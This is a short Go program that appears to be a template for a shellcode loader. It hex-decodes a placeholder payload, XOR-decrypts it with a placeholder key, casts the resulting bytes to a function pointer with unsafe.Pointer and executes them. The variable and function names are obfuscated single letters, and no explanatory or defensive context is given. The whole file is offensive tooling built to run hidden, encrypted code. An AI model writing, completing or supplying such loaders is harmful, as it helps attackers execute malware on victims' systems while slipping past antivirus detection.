package main

import (
	"encoding/hex"
	"os"
	"unsafe"
)

func main() {
	a := "<--HEXSC-->"
	b := "<--KEY-->"

	c, err := hex.DecodeString(a)
	if err != nil {
		os.Exit(1)
	}

	aa(bb(string(c), b))
}

func aa(a []byte) {
	b := *(*func() int)(unsafe.Pointer(&a[0]))
	b()
}

func bb(a string, b string) []byte {
	c := ""

	for i := 0; i < len(a); i++ {
		c += string(a[i] ^ b[i%len(b)])
	}

	return []byte(c)
}